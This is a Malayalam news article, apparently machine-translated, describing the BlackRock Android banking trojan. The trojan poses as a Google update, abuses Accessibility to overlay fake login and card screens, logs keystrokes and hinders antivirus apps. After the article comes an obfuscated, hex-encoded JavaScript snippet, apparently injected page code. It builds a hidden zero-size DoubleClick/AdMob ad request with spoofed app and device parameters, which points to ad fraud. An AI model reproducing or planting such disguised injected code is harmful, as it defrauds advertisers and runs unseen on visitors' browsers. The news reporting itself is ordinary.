ക്രെഡൻഷ്യലുകൾ, ക്രെഡിറ്റ് പാസ്വേഡ് മോഷ്ടിക്കാൻ കഴിയുന്ന പുതിയ Android വൈറസ് കണ്ടെത്തി
സോഷ്യൽ, കമ്മ്യൂണിക്കേഷൻ, ഡേറ്റിംഗ് അപ്ലിക്കേഷനുകളുടെ ഒരു ലിസ്റ്റ് ടാർഗെറ്റുചെയ്യുന്നതിനായി സുരക്ഷാ ഗവേഷകരുടെ ഒരു സംഘം കണ്ടെത്തിയ ഒരു പുതിയ Android ക്ഷുദ്രവെയർ കണ്ടെത്തി. ബ്ലാക്ക് റോക്ക് എന്നറിയപ്പെടുന്ന വൈറസ് ഒരു ബാങ്കിംഗ് ട്രോജനാണ് – ഇത് ലോക്കിബോട്ട് ആൻഡ്രോയിഡ് ട്രോജന്റെ അറിയപ്പെടുന്ന നിലവിലുള്ള സെർക്സെസ് ക്ഷുദ്രവെയറിന്റെ കോഡിൽ നിന്ന് ഉരുത്തിരിഞ്ഞതാണ്. എന്നിരുന്നാലും, ഒരു ബാങ്കിംഗ് ട്രോജൻ ആയിരുന്നിട്ടും, ക്ഷുദ്ര കോഡ് സാമ്പത്തികേതര അപ്ലിക്കേഷനുകളെ ടാർഗെറ്റുചെയ്യുമെന്ന് പറയപ്പെടുന്നു. ഇത് ആദ്യം ഒരു Google അപ്ഡേറ്റായി നടിക്കുന്നു, ഉപയോക്തൃ അനുമതികൾ ലഭിച്ചതിനുശേഷം, ഇത് അപ്ലിക്കേഷൻ ഡ്രോയറിൽ നിന്ന് അതിന്റെ ഐക്കൺ മറയ്ക്കുകയും മോശം അഭിനേതാക്കൾക്കായി പ്രവർത്തനം ആരംഭിക്കുകയും ചെയ്യുന്നു.
മെയ് മാസത്തിലാണ് ആൻഡ്രോയിഡ് ലോകത്ത് ബ്ലാക്ക് റോക്കിനെ ആദ്യമായി കണ്ടെത്തിയതെന്ന് നെതർലാൻഡ്സ് ആസ്ഥാനമായുള്ള ഭീഷണി ഇന്റലിജൻസ് കമ്പനിയായ ത്രെറ്റ് ഫാബ്രിക്കിലെ അനലിസ്റ്റ് ടീം അറിയിച്ചു. ഉപയോക്തൃ ക്രെഡൻഷ്യലുകളും ക്രെഡിറ്റ് കാർഡ് വിശദാംശങ്ങളും മോഷ്ടിക്കാൻ ഇത് പ്രാപ്തമാണ്.
ബ്ലാക്ക് റോക്ക് ക്ഷുദ്രവെയറിന്റെ കഴിവുകൾ ശരാശരി Android ബാങ്കിംഗ് ട്രോജനുകളുടേതിന് സമാനമാണെങ്കിലും, ഇത് മൊത്തം 337 ആപ്ലിക്കേഷനുകളെയാണ് ലക്ഷ്യമിടുന്നത്, ഇത് ഇതിനകം അറിയപ്പെടുന്ന ക്ഷുദ്ര കോഡുകളേക്കാൾ വളരെ കൂടുതലാണ്.
“ആ‘ പുതിയ ’ടാർഗെറ്റുകൾ കൂടുതലും ധനകാര്യ സ്ഥാപനങ്ങളുമായി ബന്ധപ്പെട്ടതല്ല, മാത്രമല്ല ക്രെഡിറ്റ് കാർഡ് വിശദാംശങ്ങൾ മോഷ്ടിക്കുന്നതിനായി അവ ഓവർലേ ചെയ്യുന്നു,” ത്രെറ്റ് ഫാബ്രിക്കിലെ ടീം ഒരു ബ്ലോഗ് പോസ്റ്റിൽ പറഞ്ഞു.
ആക്രമണങ്ങളെ ഓവർലേ ചെയ്യുന്നതിനും അയയ്ക്കുന്നതിനും സ്പാം ചെയ്യുന്നതിനും SMS സന്ദേശങ്ങൾ മോഷ്ടിക്കുന്നതിനും ഒപ്പം ലോഞ്ചർ പ്രവർത്തനത്തിൽ ഇരയെ ലോക്ക് ചെയ്യുന്നതിനും മാൽവെയറിന് രൂപകൽപ്പനയുണ്ടെന്ന് പറയപ്പെടുന്നു. ഇതിന് ഒരു കീലോഗറായി പ്രവർത്തിക്കാനും കഴിയും, അത് സാമ്പത്തിക വിവരങ്ങൾ നേടാൻ ഒരു ഹാക്കറെ സഹായിക്കും. കൂടാതെ, അവാസ്റ്റ്, എവിജി, ബിറ്റ് ഡിഫെൻഡർ, എസെറ്റ്, ട്രെൻഡ് മൈക്രോ, കാസ്പെർസ്കി, അല്ലെങ്കിൽ മക്അഫീ പോലുള്ള ഒരു ആന്റിവൈറസ് സോഫ്റ്റ്വെയറിന്റെ ഉപയോഗം വ്യതിചലിപ്പിക്കാൻ മാൽവെയറിന് കഴിവുണ്ടെന്ന് ഗവേഷകർ കണ്ടെത്തി.
ക്ഷുദ്രവെയർ ഉപയോക്തൃ വിവരങ്ങൾ എങ്ങനെ മോഷ്ടിക്കും?
ത്രെറ്റ് ഫാബ്രിക് അനുസരിച്ച്, Android- ന്റെ പ്രവേശനക്ഷമത സേവനം ദുരുപയോഗം ചെയ്ത് ഒരു യഥാർത്ഥ അപ്ലിക്കേഷന് മുകളിൽ ഒരു വ്യാജ സ്ക്രീൻ ഓവർലേ ചെയ്തുകൊണ്ട് ബ്ലാക്ക് റോക്ക് ഉപയോക്തൃ വിവരങ്ങൾ ശേഖരിക്കുന്നു. ക്ഷുദ്രകരമായ പ്രവർത്തനങ്ങൾക്കായി ഉപയോഗിക്കുന്ന ഓവർലേ സ്ക്രീനുകളിലൊന്ന് ഇരയുടെ ക്രെഡിറ്റ് കാർഡ് വിശദാംശങ്ങൾ നേടാൻ ആക്രമണകാരികളെ സഹായിക്കുന്ന ഒരു സാധാരണ കാർഡ് ഗ്രാബർ കാഴ്ചയാണ്. ക്രെഡൻഷ്യൽ ഫിഷിംഗിനായി ഓരോ ടാർഗെറ്റുചെയ്ത അപ്ലിക്കേഷനും ക്ഷുദ്രവെയറിന് കൊണ്ടുവരാൻ കഴിയും.
ഒരു Google അപ്ഡേറ്റായി പ്രത്യക്ഷപ്പെട്ടതിനുശേഷം പ്രവേശനക്ഷമത സേവന സവിശേഷതയിലേക്ക് ആക്സസ് അനുവദിക്കാൻ ബ്ലാക്ക് റോക്ക് ഉപയോക്താക്കളോട് ആവശ്യപ്പെടുന്നു. അനുവദിച്ചുകഴിഞ്ഞാൽ, ഇത് അപ്ലിക്കേഷൻ ഡ്രോയറിൽ നിന്ന് അതിന്റെ അപ്ലിക്കേഷൻ ഐക്കൺ മറയ്ക്കുകയും പശ്ചാത്തലത്തിൽ ക്ഷുദ്രകരമായ പ്രക്രിയ ആരംഭിക്കുകയും ചെയ്യുന്നു. പ്രവേശനക്ഷമത സേവന ആക്സസ് ലഭിച്ചതിന് ശേഷം ഇതിന് മറ്റ് അനുമതികൾ നൽകാനും വിട്ടുവീഴ്ച ചെയ്യാത്ത ഉപകരണം നിയന്ത്രിക്കുന്നതിന് Android വർക്ക് പ്രൊഫൈലുകൾ ഉപയോഗിക്കാനും കഴിയും….
var pubid = '1622245896776174';
var s1 = '7970526223';
var pn1 = 'com.FindThePairGame';
var _0x6717=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x6F\x6F\x67\x6C\x65\x61\x64\x73\x2E\x67\x2E\x64\x6F\x75\x62\x6C\x65\x63\x6C\x69\x63\x6B\x2E\x6E\x65\x74\x2F\x6D\x61\x64\x73\x2F\x67\x6D\x61\x3F\x70\x72\x65\x71\x73\x3D\x30\x26\x75\x5F\x73\x64\x3D\x31\x2E\x35\x26\x75\x5F\x77\x3D\x33\x32\x30\x26\x6D\x73\x69\x64\x3D","\x26\x63\x61\x70\x3D\x61\x26\x6A\x73\x3D\x61\x66\x6D\x61\x2D\x73\x64\x6B\x2D\x61\x2D\x76\x33\x2E\x33\x2E\x30\x26\x74\x6F\x61\x72\x3D\x30\x26\x69\x73\x75\x3D\x57\x25\x32\x37\x2B\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x2A\x39\x25\x32\x39\x2B\x25\x32\x37\x45\x45\x41\x42\x42\x38\x45\x45\x25\x32\x37\x2B\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x2A\x39\x39\x25\x32\x39\x2B\x25\x32\x37\x43\x32\x42\x45\x37\x37\x30\x42\x36\x38\x34\x44\x25\x32\x37\x2B\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x2A\x39\x39\x39\x39\x39\x25\x32\x39\x2B\x25\x32\x37\x45\x43\x42\x26\x63\x69\x70\x61\x3D\x30\x26\x66\x6F\x72\x6D\x61\x74\x3D\x33\x32\x30\x78\x35\x30\x5F\x6D\x62\x26\x6E\x65\x74\x3D\x77\x69\x26\x61\x70\x70\x5F\x6E\x61\x6D\x65\x3D\x31\x2E\x61\x6E\x64\x72\x6F\x69\x64\x2E","\x26\x68\x6C\x3D\x65\x6E\x26\x75\x5F\x68\x3D\x25\x32\x37\x2B\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x2A\x39\x39\x39\x25\x32\x39\x2B\x25\x32\x37\x26\x63\x61\x72\x72\x69\x65\x72\x3D\x25\x32\x37\x2B\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x2A\x39\x39\x39\x39\x39\x39\x25\x32\x39\x2B\x25\x32\x37\x26\x70\x74\x69\x6D\x65\x3D\x30\x26\x75\x5F\x61\x75\x64\x69\x6F\x3D\x34\x26\x75\x5F\x73\x6F\x3D\x70\x26\x6F\x75\x74\x70\x75\x74\x3D\x68\x74\x6D\x6C\x26\x72\x65\x67\x69\x6F\x6E\x3D\x6D\x6F\x62\x69\x6C\x65\x5F\x61\x70\x70\x26\x75\x5F\x74\x7A\x3D\x2D\x25\x32\x37\x2B\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x2A\x39\x39\x39\x25\x32\x39\x2B\x25\x32\x37\x26\x63\x6C\x69\x65\x6E\x74\x5F\x73\x64\x6B\x3D\x31\x26\x65\x78\x3D\x31\x26\x63\x6C\x69\x65\x6E\x74\x3D\x63\x61\x2D\x61\x70\x70\x2D\x70\x75\x62\x2D","\x26\x73\x6C\x6F\x74\x6E\x61\x6D\x65\x3D","\x26\x63\x61\x70\x73\x3D\x69\x6E\x6C\x69\x6E\x65\x56\x69\x64\x65\x6F\x5F\x69\x6E\x74\x65\x72\x61\x63\x74\x69\x76\x65\x56\x69\x64\x65\x6F\x5F\x6D\x72\x61\x69\x64\x31\x5F\x63\x6C\x69\x63\x6B\x54\x72\x61\x63\x6B\x69\x6E\x67\x5F\x73\x64\x6B\x41\x64\x6D\x6F\x62\x41\x70\x69\x46\x6F\x72\x41\x64\x73\x26\x6A\x73\x76\x3D\x31\x38\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x35\x35\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x33\x32\x35\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x6D\x61\x72\x67\x69\x6E\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x6D\x61\x72\x67\x69\x6E\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20"];var src1=_0x6717[0]+ pn1+ _0x6717[1]+ pn1+ _0x6717[2]+ pubid+ _0x6717[3]+ s1+ _0x6717[4]